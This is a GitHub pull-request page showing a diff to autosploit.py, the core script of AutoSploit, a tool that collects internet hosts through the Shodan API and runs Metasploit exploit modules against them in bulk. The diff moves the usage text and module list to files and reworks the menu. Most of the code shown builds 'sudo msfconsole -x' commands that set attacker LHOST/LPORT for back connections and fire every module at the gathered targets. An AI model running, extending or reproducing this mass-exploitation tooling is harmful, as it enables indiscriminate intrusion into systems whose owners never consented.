Skip to content

updates #32

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
NullArray merged 2 commits into from
Feb 7, 2018
Merged

updates #32

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
4a149dd
created some updates and moved the modules and usage into etc/ folder…
Feb 7, 2018
cb3bece
Merge branch 'dev-beta' into dev-beta
Ekultek Feb 7, 2018
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
150 changes: 63 additions & 87 deletions autosploit.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,12 +1,13 @@
#!/usr/bin/env python2.7
"""Autosploit Core."""
"""Autosploit Core, beta development version"""

import os, sys
import time
import pickle
import shodan

from retrying import retry
# idk if you're going to need this since retrying is a decorator (see line 410)
# from retrying import retry
from blessings import Terminal
from subprocess import PIPE, Popen

Expand All @@ -20,7 +21,13 @@
local_host = ""
configured = False
toolbar_width = 60

usage_and_legal_path = "{}/etc/general".format(os.getcwd())
modules_path = "{}/etc/modules.txt".format(os.getcwd())
autosploit_opts = {
1: "usage and legal", 2: "gather hosts", 3: "custom hosts",
4: "add single host", 5: "view gathered hosts", 6: "exploit gathered hosts",
7: "quit"
}

def logo():
"""Logo."""
Expand All @@ -36,48 +43,11 @@ def logo():

def usage():
"""Usage & Legal."""
global usage_and_legal_path
print("\033[H\033[J") # Clear terminal
logo()
print("""
+-----------------------------------------------------------------------+
| AutoSploit General Usage and Information |
+-----------------------------------------------------------------------+
|As the name suggests AutoSploit attempts to automate the exploitation |
|of remote hosts. Targets are collected by employing the Shodan.io API. |
| |
|The 'Gather Hosts' option will open a dialog from which you can |
|enter platform specific search queries such as 'Apache' or 'IIS'. |
|Upon doing so a list of candidates will be retrieved and saved to |
|hosts.txt in the current working directory. |
|As of version 1.4.9 an option to load a custom list of hosts has been |
|included. |
|After this operation has been completed the 'Exploit' option will |
|go about the business of attempting to exploit these targets by |
|running a range of Metasploit modules against them. |
| |
|Workspace, local host and local port for MSF facilitated |
|back connections are configured through the dialog that comes up |
|before the 'Exploit' module is started. |
| |
+------------------+----------------------------------------------------+
| Option | Summary |
+------------------+----------------------------------------------------+
|1. Usage/Legal | Display this informational message & Disclaimer |
|2. Gather Hosts | Query Shodan for a list of platform specific IPs. |
|3. Custom Hosts | Load in a custom list of IPs/Rhosts |
|4. Single Host | Add a single host to list and/or exploit directly |
|5. View Hosts | Print gathered IPs/RHOSTS. |
|6. Exploit | Configure MSF and Start exploiting gathered targets|
|7. Quit | Exits AutoSploit. |
+------------------+----------------------------------------------------+
| Legal Disclaimer |
+-----------------------------------------------------------------------+
|Usage of AutoSploit for attacking targets without prior mutual consent |
|is illegal. It is the end user's responsibility to obey all applicable |
|local, state, and federal laws. Developers assume no liability and are |
|not responsible for any misuse or damage caused by this program. |
+-----------------------------------------------------------------------+
""")
with open(usage_and_legal_path) as info:
print(info.read())


def cmdline(command):
Expand All @@ -99,56 +69,57 @@ def cmdline(command):

def exploit(query=None, single=None):
"""Exploit component"""

global workspace
global local_port
global local_host
global modules_path
print("\033[H\033[J") # Clear terminal

logo()

sorted_modules = []
all_modules = []

if query == None:
rhosts = single

print("\n[{}]Single target mode. All available modules will be run against provided RHOST.".format(t.green("+")))
proceed = raw_input("[" + t.magenta("?") + "]Continue? [Y]es/[N]o: ").lower()

if proceed == 'y':
print("\n\n\n[{}]Loading modules...".format(t.green("+")))
# Progress bar
sys.stdout.write("[%s]" % (" " * toolbar_width))
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width + 1))
with open("modules.txt", "rb") as infile:

with open(modules_path, "rb") as infile:
for i in xrange(toolbar_width):
time.sleep(0.1)
time.sleep(0.1)
for lines in infile:
all_modules.append(lines)

print("\n\n\n[{}]Done. Launching exploits.".format(t.green("+")))
template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % (workspace, local_host, local_port, rhosts, exploit)
cmdline(template)

elif proceed == 'n':
print("[{}]Aborted. Returning to Main Menu".format(t.red("!")))

else:
print("[{}]Unhandled Option. Defaulting to Main Menu".format(t.red("!")))

else:
print("[{}]Sorting modules relevant to the specified platform.".format(t.green("+")))
print("[{}]This may take a while...\n\n\n".format(t.green("+")))

# Progress bar
sys.stdout.write("[%s]" % (" " * toolbar_width))
sys.stdout.flush()
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width + 1))

with open("modules.txt", "rb") as infile:
with open(modules_path, "rb") as infile:
for i in xrange(toolbar_width):
time.sleep(0.1)
for lines in infile:
Expand Down Expand Up @@ -185,7 +156,7 @@ def exploit(query=None, single=None):
cmdline(template)
else:
print("[{}]Unhandled Option. Defaulting to Main Menu".format(t.red("!")))


def settings(single=None):
"""Function to define Metasploit settings."""
Expand Down Expand Up @@ -237,14 +208,14 @@ def settings(single=None):
# When we return to the main menu loop we will use it to check to see if we
# can skip the config stage. When the exploit component is run a second time
configured = True

if single is not None:
exploit(None, single)
# TEST print
print "De waarde van 'single' is" +repr(single)
print 'we moete nu de exploit module in met de juiste waarde'
# TEST print

if not os.path.isfile("hosts.txt"):
print("[{}]Warning. AutoSploit failed to detect host file.".format(t.red("!")))
print("In order for the exploit module to work, a host file needs to be present.")
Expand All @@ -265,12 +236,13 @@ def targets(clobber=True):
print("[{}]Please provide your platform specific search query.".format(t.green("+")))
print("[{}]I.E. 'IIS' will return a list of IPs belonging to IIS servers.".format(t.green("+")))

# /TODO:
while True:
query = raw_input("\n<" + t.cyan("PLATFORM") + ">$ ")

if query == "":
print("[{}]Query cannot be null.".format(t.red("!")))

break


Expand All @@ -288,6 +260,7 @@ def targets(clobber=True):
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width + 1))

# TODO:/
if clobber:
with open('hosts.txt', 'wb') as log:
for i in xrange(toolbar_width):
Expand All @@ -305,6 +278,7 @@ def targets(clobber=True):
print("\n\n\n[{}]Done.".format(t.green("+")))
print("[{}]Host list saved to {}".format(t.green("+"), hostpath))

# TODO:/
else:
with open("hosts.txt", "ab") as log:
for i in xrange(toolbar_width):
Expand All @@ -324,13 +298,16 @@ def targets(clobber=True):



def import_custom(clobber=True):
"""Function to import custom host list."""
# TODO:/
def import_custom(clobber=True):
"""
Function to import custom host list.
"""
print("\033[H\033[J") # Clear terminal
logo()

custom_list = []

print("[{}]Please provide a path to your custom host list.".format(t.green("+")))
file_path = raw_input("\n[" + t.magenta("?") + "]Path to list: "

Expand All @@ -342,7 +319,7 @@ def import_custom(clobber=True):
except IOError as e:
print("\n[{}]Critical. An IO error was raised.".format(t.red("!")))
print("Please make sure to enter a valid path.")

if clobber:
print("[{}]Writing data to 'hosts.txt'...".format(t.green("+")))
with open('hosts.txt', 'wb') as outfile:
Expand All @@ -351,10 +328,10 @@ def import_custom(clobber=True):
outfile.write("\n")

hostpath = os.path.abspath("hosts.txt")

print("\n\n\n[{}]Done.".format(t.green("+")))
print("[{}]Host list saved to {}".format(t.green("+"), hostpath))

else:
print("[{}]Appending data to 'hosts.txt'...".format(t.green("+")))

Expand All @@ -364,19 +341,20 @@ def import_custom(clobber=True):
outfile.write("\n")

hostpath = os.path.abspath("hosts.txt")

print("\n\n\n[{}]Done.".format(t.green("+")))
print("[{}]Host list saved to {}".format(t.green("+"), hostpath))


def single_target()
def single_target():
# TODO:/
"""
Add single target to host list or pass it to the exploit function directly
to attempt to exploit it.
"""
print("\033[H\033[J") # Clear terminal
logo()

print("[{}]Please provide a single IPv4.".format(t.green("+")))
IP = raw_input("[" + t.magenta("?") + "]IPv4 Address: ")

Expand All @@ -387,9 +365,9 @@ def single_target()
quartet3 = int(IP[0:IP.index('.')])
IP = IP[IP.index('.')+1:]
quartet4 = int(IP)

IP = str(quartet1) + "." + str(quartet2) + "." + str(quartet3) + "." + str(quartet4)

if quartet1 < 0 or quartet1 > 255:
print("[{}]Critical. Invalid IPv4 address.".format(t.red("!")))
elif quartet2 < 0 or quartet2 > 255:
Expand All @@ -403,33 +381,35 @@ def single_target()
else:
print("\n[{}]Host set to {}".format(t.green("+"), repr(hostpath)))
time.sleep(1)

print("\n\n[{}]Append the IP to the host file or pass to exploit module directly?.".format(t.green("+")))
choice = raw_input("\n[" + t.magenta("?") + "]Append or Pass for immediate exploitation? [A/P]: ").lower()

if choice == 'a':
with open( "hosts.txt", "ab") as outfile:
outfile.write(IP)

hostpath = os.path.abspath("hosts.txt")
print("[{}]Host added to {}".format(t.green("+"), hostpath))

elif choice == 'p':
if configured:
exploit(None, IP)
else:
settings(IP)

else:
print("\n[{}]Unhandled Option.".format(t.red("!")))


def main():
"""Main menu."""
global query
global configured
global api
global autosploit_opts

# TODO:/
@retry(stop_max_attempt_number=3)
def try_shodan():
try:
Expand All @@ -449,12 +429,8 @@ def try_shodan():
settings()

print("\n[{}]Welcome to AutoSploit. Please select an action.".format(t.green("+")))
print("""

1. Usage/Legal 4. Add Single host 7. Quit
2. Gather Hosts 5. View Hosts
3. Custom Hosts 6. Exploit
""")
for i in autosploit_opts.keys():
print("{}. {}".format(i, autosploit_opts[i].title()))

action = raw_input("\n<" + t.cyan("AUTOSPLOIT") + ">$ ")

Expand All @@ -473,20 +449,20 @@ def try_shodan():
targets(True)
else:
print("\n[{}]Unhandled Option.".format(t.red("!")))

elif action == '3':
if not os.path.isfile("hosts.txt"):
import_custom(True)
else:
append = raw_input("\n[" + t.magenta("?") + "]Append hosts to file or overwrite? [A/O]: ").lower()

if append == 'a':
import_custom(False)
elif append == 'o':
import_custom(True)
else:
print("\n[{}]Unhandled Option.".format(t.red("!")))

elif action == '4':
single_target()

Expand Down
Loading